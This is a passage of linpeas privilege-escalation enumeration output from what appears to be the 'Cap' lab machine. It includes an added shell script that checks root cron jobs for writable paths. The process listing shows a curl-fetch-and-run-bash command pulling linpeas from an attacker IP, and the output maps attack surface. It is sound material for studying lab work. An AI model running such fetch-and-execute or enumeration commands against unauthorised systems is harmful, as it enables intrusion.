═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════                                                                                                           
                                     ╚═══════╝                                                                                                                                                
bash: line 2211: check_aliyun_ecs: command not found
grep: /etc/cloud/cloud.cfg: No such file or directory
═╣ GCP Virtual Machine? ................. No
═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM? ............................ No
═╣ Azure APP? ........................... No
═╣ Aliyun ECS? .......................... 
═╣ Tencent CVM? ......................... No                                                                                                                                                  



                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════                                                                                                            
                ╚════════════════════════════════════════════════╝                                                                                                                            
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes                                                                   
Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users                                                                                                             
nathan     19368  0.0  0.2   7020  5028 pts/0    Ss   13:59   0:00 -bash
nathan     19544  0.0  0.5  23544 10800 pts/0    S+   14:05   0:00  _ curl http://10.10.14.38/linpeas.sh
nathan     19545  0.8  0.2   7964  5884 pts/0    S+   14:05   0:00  _ bash
nathan     22771  0.0  0.1   7964  3940 pts/0    S+   14:06   0:00      _ bash
nathan     22775  0.0  0.1   7648  3236 pts/0    R+   14:06   0:00      |   _ ps fauxwww
nathan     22773  0.0  0.1   7964  2724 pts/0    R+   14:06   0:00      _ bash
nathan     22774  0.0  0.1   7964  2724 pts/0    S+   14:06   0:00      _ bash
nathan     19241  0.0  0.4  18520  9748 ?        Ss   13:59   0:00 /lib/systemd/systemd --user
nathan     22647  0.0  0.2   7108  4108 ?        Ss   14:06   0:00  _ /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only


╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory                                                                                            
gdm-password Not Found                                                                                                                                                                        
gnome-keyring-daemon Not Found                                                                                                                                                                
lightdm Not Found                                                                                                                                                                             
vsftpd Not Found                                                                                                                                                                              
apache2 Not Found                                                                                                                                                                             
sshd Not Found                                                                                                                                                                                
                                                                                                                                                                                              
╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user                                                                                                                     
                                                                                                                                                                                              
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information                                                                                            
COMMAND     PID   USER   FD      TYPE             DEVICE SIZE/OFF       NODE NAME                                                                                                             

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths                                                                                                
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin                                                                                                                   

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs                                                                                                        
/usr/bin/crontab                                                                                                                                                                              
incrontab Not Found
-rw-r--r-- 1 root root    1042 Feb 13  2020 /etc/crontab                                                                                                                                      

/etc/cron.d:
total 20
drwxr-xr-x  2 root root 4096 Jul 31  2020 .
drwxr-xr-x 92 root root 4096 Jul 23  2021 ..
-rw-r--r--  1 root root  102 Feb 13  2020 .placeholder
-rw-r--r--  1 root root  201 Feb 14  2020 e2scrub_all
-rw-r--r--  1 root root  190 Jul 31  2020 popularity-contest

/etc/cron.daily:
total 48
drwxr-xr-x  2 root root 4096 May 31  2021 .
drwxr-xr-x 92 root root 4096 Jul 23  2021 ..
-rw-r--r--  1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x  1 root root  376 Dec  4  2019 apport
-rwxr-xr-x  1 root root 1478 Apr  9  2020 apt-compat
-rwxr-xr-x  1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x  1 root root 1187 Sep  5  2019 dpkg
-rwxr-xr-x  1 root root  377 Jan 21  2019 logrotate
-rwxr-xr-x  1 root root 1123 Feb 25  2020 man-db
-rwxr-xr-x  1 root root 4574 Jul 18  2019 popularity-contest
-rwxr-xr-x  1 root root  214 Apr  2  2020 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Jul 31  2020 .
drwxr-xr-x 92 root root 4096 Jul 23  2021 ..
-rw-r--r--  1 root root  102 Feb 13  2020 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Jul 31  2020 .
drwxr-xr-x 92 root root 4096 Jul 23  2021 ..
-rw-r--r--  1 root root  102 Feb 13  2020 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 May 23  2021 .
drwxr-xr-x 92 root root 4096 Jul 23  2021 ..
-rw-r--r--  1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x  1 root root  813 Feb 25  2020 man-db
-rwxr-xr-x  1 root root  211 Apr  2  2020 update-notifier-common

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
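The cron listing above is what linpeas dumps for the HackTricks "scheduled cron jobs" check. What a pentester actually wants from it is a short answer to one question: does any job that root runs reference a path the current user can write? The POSIX shell functions below, added here as an example and not part of the original writeup or of linpeas, parse the system-crontab format shown above (`m h dom mon dow user command`, or `@reboot user command`) and report writable absolute paths in root's commands. The sample crontab they load is constructed for the example: it repeats Cap's real root entries and adds one made-up `backup.sh` job pointing at a script in a temp directory, so the check has something to flag.

```shell
#!/bin/sh
# Added example, not from the original writeup or from linpeas: audit a
# system crontab (the /etc/crontab and /etc/cron.d format: m h dom mon dow
# user command, or @reboot user command) for root jobs whose command
# references a path the current user can write.

# cron_jobs_for USER FILE
# Print the command part of every entry in FILE that cron runs as USER.
# Comment lines, blank lines and VAR=value assignments are skipped.
cron_jobs_for() {
    user="$1"; file="$2"
    awk -v u="$user" '
        /^[ \t]*#/ || /^[ \t]*$/ || /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/ { next }
        { n = ($1 ~ /^@/) ? 2 : 6 }       # @reboot-style lines carry the user in field 2
        $n == u {
            for (i = 1; i <= n; i++) $i = ""
            sub(/^[ \t]+/, "")            # drop the blanks left by the emptied fields
            print
        }' "$file"
}

# writable_cron_targets USER FILE
# For each job run as USER, print every absolute path in its command that
# the current user can write, one per line.
writable_cron_targets() {
    cron_jobs_for "$1" "$2" | while IFS= read -r cmd; do
        for tok in $cmd; do
            case "$tok" in
                /*) if [ -w "$tok" ]; then printf '%s\n' "$tok"; fi ;;
            esac
        done
    done
}

# Constructed sample: Cap's real root entries plus one made-up job
# (backup.sh) that points at a script we own, so the check has a hit.
CRON_SAMPLE_DIR="$(mktemp -d)"
printf '#!/bin/sh\necho backup\n' > "$CRON_SAMPLE_DIR/backup.sh"
cat > "$CRON_SAMPLE_DIR/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 *   * * *   root    $CRON_SAMPLE_DIR/backup.sh --quiet
EOF

echo "root jobs:"
cron_jobs_for root "$CRON_SAMPLE_DIR/crontab"
echo "writable targets of root jobs:"
writable_cron_targets root "$CRON_SAMPLE_DIR/crontab"
```

Run as an unprivileged user, only the made-up `backup.sh` is reported; run as root, `/` and `/etc/cron.hourly` show up too, which is the correct answer for root and a reminder to run the check from the low-privilege shell you actually have. Per-user crontabs (`crontab -l`) use the five-field format without a user column and are not parsed by this function; on Cap the `/etc/cron.*` directories are all root-owned and not writable, so the listing above yields nothing, which is why the box's privilege escalation goes elsewhere.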

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers                                                                                                                     
NEXT                        LEFT          LAST                        PASSED       UNIT                         ACTIVATES                                                                     
Thu 2024-11-07 14:31:18 UTC 24min left    Thu 2024-11-07 03:24:27 UTC 10h ago      apt-daily.timer              apt-daily.service             
Thu 2024-11-07 15:55:07 UTC 1h 48min left Thu 2024-11-07 03:45:22 UTC 10h ago      ua-messaging.timer           ua-messaging.service          
Thu 2024-11-07 21:04:51 UTC 6h left       Thu 2024-11-07 08:20:23 UTC 5h 46min ago motd-news.timer              motd-news.service             
Fri 2024-11-08 00:00:00 UTC 9h left       Thu 2024-11-07 03:23:29 UTC 10h ago      logrotate.timer              logrotate.service             
Fri 2024-11-08 00:00:00 UTC 9h left       Thu 2024-11-07 03:23:29 UTC 10h ago      man-db.timer                 man-db.service                
Fri 2024-11-08 00:10:49 UTC 10h left      Thu 2024-11-07 08:33:18 UTC 5h 33min ago fwupd-refresh.timer          fwupd-refresh.service         
Fri 2024-11-08 03:37:52 UTC 13h left      Thu 2024-11-07 03:37:52 UTC 10h ago      systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Fri 2024-11-08 06:21:27 UTC 16h left      Thu 2024-11-07 06:18:51 UTC 7h ago       apt-daily-upgrade.timer      apt-daily-upgrade.service     
Sun 2024-11-10 03:10:36 UTC 2 days left   Thu 2024-11-07 03:24:10 UTC 10h ago      e2scrub_all.timer            e2scrub_all.service           
Mon 2024-11-11 00:00:00 UTC 3 days left   Thu 2024-11-07 03:23:29 UTC 10h ago      fstrim.timer                 fstrim.service                
n/a                         n/a           n/a                         n/a          snapd.snap-repair.timer      snapd.snap-repair.service     

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers                                                                                                                     
                                                                                                                                                                                              
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services                                                                                                                   
/etc/systemd/system/multi-user.target.wants/atd.service could be executing some relative path                                                                                                 
You can't write on systemd PATH

╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets                                                                                                                    
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request                                                                                   
/snap/core18/2066/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2066/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2066/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2066/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2066/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core18/2066/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/snap/core18/2066/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2066/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2066/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core18/2074/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2074/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2074/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2074/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2074/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core18/2074/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/snap/core18/2074/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2074/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2074/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets                                                                                                                    
/org/kernel/linux/storage/multipathd                                                                                                                                                          
/run/dbus/system_bus_socket
  └─(Read Write)
/run/irqbalance//irqbalance997.sock
  └─(Read )
/run/irqbalance/irqbalance997.sock
  └─(Read )
/run/lvm/lvmpolld.socket
/run/snapd-snap.socket
  └─(Read Write)
/run/snapd.socket
  └─(Read Write)
/run/systemd/journal/dev-log
  └─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/journal/syslog
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
  └─(Read Write)
/run/udev/control
/run/user/1001/bus
  └─(Read Write)
/run/user/1001/gnupg/S.dirmngr
  └─(Read Write)
/run/user/1001/gnupg/S.gpg-agent
  └─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.browser
  └─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.extra
  └─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.ssh
  └─(Read Write)
/run/user/1001/pk-debconf-socket
  └─(Read Write)
/run/user/1001/snapd-session-agent.socket
  └─(Read Write)
/run/user/1001/systemd/notify
  └─(Read Write)
/run/user/1001/systemd/private
  └─(Read Write)
/run/uuidd/request
  └─(Read Write)
/run/vmware/guestServicePipe
  └─(Read Write)
/var/run/vmware/guestServicePipe
  └─(Read Write)
/var/snap/lxd/common/lxd/unix.socket

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus                                                                                                                      
NAME                          PID PROCESS USER CONNECTION    UNIT SESSION DESCRIPTION                                                                                                         
:1.0                            - -       -    -             -    -       -
:1.18                           - -       -    -             -    -       -
:1.2                            - -       -    -             -    -       -
:1.22                           - -       -    -             -    -       -
:1.28                           - -       -    -             -    -       -
:1.3                            - -       -    -             -    -       -
:1.4                            - -       -    -             -    -       -
:1.5                            - -       -    -             -    -       -
:1.6                            - -       -    -             -    -       -
:1.7                            - -       -    -             -    -       -
:1.8                            - -       -    -             -    -       -
com.ubuntu.LanguageSelector     - -       -    (activatable) -    -       -
com.ubuntu.SoftwareProperties   - -       -    (activatable) -    -       -
org.freedesktop.Accounts        - -       -    -             -    -       -
org.freedesktop.DBus            - -       -    -             -    -       -
org.freedesktop.PackageKit      - -       -    (activatable) -    -       -
org.freedesktop.PolicyKit1      - -       -    -             -    -       -
org.freedesktop.UPower          - -       -    -             -    -       -
org.freedesktop.bolt            - -       -    (activatable) -    -       -
org.freedesktop.fwupd           - -       -    (activatable) -    -       -
org.freedesktop.hostname1       - -       -    (activatable) -    -       -
org.freedesktop.locale1         - -       -    (activatable) -    -       -
org.freedesktop.login1          - -       -    -             -    -       -
org.freedesktop.network1        - -       -    -             -    -       -
org.freedesktop.resolve1        - -       -    -             -    -       -
org.freedesktop.systemd1        - -       -    -             -    -       -
org.freedesktop.thermald        - -       -    (activatable) -    -       -
org.freedesktop.timedate1       - -       -    (activatable) -    -       -
org.freedesktop.timesync1       - -       -    -             -    -       -
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus                                                                                                                      
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf (        <policy group="power">)                                                                        



                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════                                                                                                           
                              ╚═════════════════════╝                                                                                                                                         
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information                                                                                                                           
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.235.149  netmask 255.255.0.0  broadcast 10.129.255.255
        inet6 fe80::250:56ff:feb0:2cd8  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb0:2cd8  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b0:2c:d8  txqueuelen 1000  (Ethernet)
        RX packets 48334  bytes 5934831 (5.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 34069  bytes 6673170 (6.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 43832  bytes 3451192 (3.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 43832  bytes 3451192 (3.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


╔══════════╣ Hostname, hosts and DNS
cap                                                                                                                                                                                           
127.0.0.1 localhost
127.0.0.1 cap

nameserver 127.0.0.53
options edns0 trust-ad

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                                                 
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                                                                                                             
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   

╔══════════╣ Can I sniff with tcpdump?
No                                                                                                                                                                                            
                                                                                                                                                                                              


                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════                                                                                                           
                               ╚═══════════════════╝                                                                                                                                          
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users                                                                                                                      
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)                                                                                                                                         

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg                                                                                                                                                                                  
netpgpkeys Not Found
netpgp Not Found                                                                                                                                                                              
                                                                                                                                                                                              
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                              
Sorry, try again.                                                                                                                                                                             

╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens                                                                                                        
ptrace protection is enabled (1)                                                                                                                                                              

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2                                                                                    
                                                                                                                                                                                              
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                                                                                                                               

╔══════════╣ Users with console
nathan:x:1001:1001::/home/nathan:/bin/bash                                                                                                                                                    
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                                                                                                                        
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(landscape) gid=115(landscape) groups=115(landscape)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=112(ftp) gid=118(ftp) groups=118(ftp)
uid=113(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=998(lxd) gid=100(users) groups=100(users)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)

╔══════════╣ Login now
 14:06:37 up 10:43,  1 user,  load average: 0.17, 0.06, 0.02                                                                                                                                  
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

╔══════════╣ Last logons
root     pts/0        Fri May 21 14:32:11 2021 - down                      (00:01)     10.10.14.7                                                                                             
root     tty1         Fri May 21 14:31:21 2021 - down                      (00:02)     0.0.0.0
reboot   system boot  Fri May 21 14:30:50 2021 - Fri May 21 14:33:53 2021  (00:03)     0.0.0.0
root     tty1         Fri May 21 13:43:26 2021 - down                      (00:47)     0.0.0.0
reboot   system boot  Fri May 21 13:40:52 2021 - Fri May 21 14:30:42 2021  (00:49)     0.0.0.0
root     tty1         Sat May 15 21:41:23 2021 - down                      (00:01)     0.0.0.0
lab      tty1         Sat May 15 21:40:56 2021 - Sat May 15 21:41:11 2021  (00:00)     0.0.0.0
reboot   system boot  Sat May 15 21:40:45 2021 - Sat May 15 21:42:37 2021  (00:01)     0.0.0.0

wtmp begins Sat May 15 21:40:29 2021

╔══════════╣ Last time logon each user
Username         Port     From             Latest                                                                                                                                             
root             tty1                      Fri Jul 23 13:29:13 +0000 2021
nathan           pts/0    10.10.14.38      Thu Nov  7 13:59:21 +0000 2024

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)
                                                                                                                                                                                              
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
                                                                                                                                                                                              


                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════                                                                                                            
                             ╚══════════════════════╝                                                                                                                                         
╔══════════╣ Useful software
/usr/bin/base64                                                                                                                                                                               
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/snap/bin/lxc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
ii  g++                                  4:9.3.0-1ubuntu2                  amd64        GNU C++ compiler                                                                                      
ii  g++-9                                9.3.0-17ubuntu1~20.04             amd64        GNU C++ compiler
ii  gcc                                  4:9.3.0-1ubuntu2                  amd64        GNU C compiler
ii  gcc-9                                9.3.0-17ubuntu1~20.04             amd64        GNU C compiler
/usr/bin/gcc
/usr/bin/g++

╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Oct 15  2019 /usr/share/doc/rsync/examples/rsyncd.conf                                                                                                            
[ftp]
        comment = public archive
        path = /var/www/pub
        use chroot = yes
        lock file = /var/lock/rsyncd
        read only = yes
        list = yes
        uid = nobody
        gid = nogroup
        strict modes = yes
        ignore errors = no
        ignore nonreadable = yes
        transfer logging = no
        timeout = 600
        refuse options = checksum dry-run
        dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz


╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 May 31  2021 /etc/pam.d                                                                                                                                           
-rw-r--r-- 1 root root 2133 May 29  2020 /etc/pam.d/sshd
account    required     pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_keyinit.so force revoke
session    optional     pam_motd.so  motd=/run/motd.dynamic
session    optional     pam_motd.so noupdate
session    optional     pam_mail.so standard noenv # [1]
session    required     pam_limits.so
session    required     pam_env.so # [1]
session    required     pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so open


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'                                                                                                                                          
drwxr-xr-x 2 root root 4096 May 23  2021 /etc/ldap

drwxr-xr-x 2 root root 32 May  7  2021 /snap/core18/2066/etc/ldap

drwxr-xr-x 2 root root 32 Jun 11  2021 /snap/core18/2074/etc/ldap


╔══════════╣ Analyzing Cloud Init Files (limit 70)
-rw-r--r-- 1 root root 3559 Apr 19  2021 /snap/core18/2066/etc/cloud/cloud.cfg                                                                                                                
     lock_passwd: True
-rw-r--r-- 1 root root 3559 May 11  2021 /snap/core18/2074/etc/cloud/cloud.cfg
     lock_passwd: True

╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 200 May  7  2021 /snap/core18/2066/usr/share/keyrings                                                                                                                  
drwxr-xr-x 2 root root 200 Jun 11  2021 /snap/core18/2074/usr/share/keyrings
drwxr-xr-x 2 root root 4096 May 23  2021 /usr/share/keyrings




╔══════════╣ Analyzing Cache Vi Files (limit 70)
                                                                                                                                                                                              
lrwxrwxrwx 1 root root 9 May 27  2021 /home/nathan/.viminfo -> /dev/null

╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 675 Apr  2  2018 /snap/core18/2066/usr/share/bash-completion/completions/postfix                                                                                       

-rw-r--r-- 1 root root 675 Apr  2  2018 /snap/core18/2074/usr/share/bash-completion/completions/postfix

-rw-r--r-- 1 root root 813 Feb  2  2020 /usr/share/bash-completion/completions/postfix


╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 5850 Mar  6  2019 /etc/vsftpd.conf                                                                                                                                     
anonymous_enable
local_enable=YES
#write_enable=YES
#anon_upload_enable=YES
#anon_mkdir_write_enable=YES
#chown_uploads=YES
#chown_username=whoever
-rw-r--r-- 1 root root 41 Jun 18  2015 /usr/lib/tmpfiles.d/vsftpd.conf
-rw-r--r-- 1 root root 506 Mar  6  2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE/vsftpd.conf
anonymous_enable
local_enable
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 564 Mar  6  2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE_NOINETD/vsftpd.conf
anonymous_enable
local_enable
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 260 Feb  2  2008 /usr/share/doc/vsftpd/examples/VIRTUAL_USERS/vsftpd.conf
anonymous_enable
local_enable=YES
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable

╔══════════╣ Analyzing DNS Files (limit 70)
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind                                                                                                           
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind

╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25  2020 /etc/skel/.bashrc                                                                                                                                    
-rw-r--r-- 1 nathan nathan 3771 Feb 25  2020 /home/nathan/.bashrc
-rw-r--r-- 1 root root 3771 Apr  4  2018 /snap/core18/2066/etc/skel/.bashrc
-rw-r--r-- 1 root root 3771 Apr  4  2018 /snap/core18/2074/etc/skel/.bashrc

-rw-r--r-- 1 root root 807 Feb 25  2020 /etc/skel/.profile
-rw-r--r-- 1 nathan nathan 807 Feb 25  2020 /home/nathan/.profile
-rw-r--r-- 1 root root 807 Apr  4  2018 /snap/core18/2066/etc/skel/.profile
-rw-r--r-- 1 root root 807 Apr  4  2018 /snap/core18/2074/etc/skel/.profile

╔══════════╣ Searching mysql credentials and exec
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg                                                                                                                                                                                  
netpgpkeys Not Found
netpgp Not Found                                                                                                                                                                              
-rw-r--r-- 1 root root 2796 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /snap/core18/2066/usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /snap/core18/2066/usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /snap/core18/2066/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
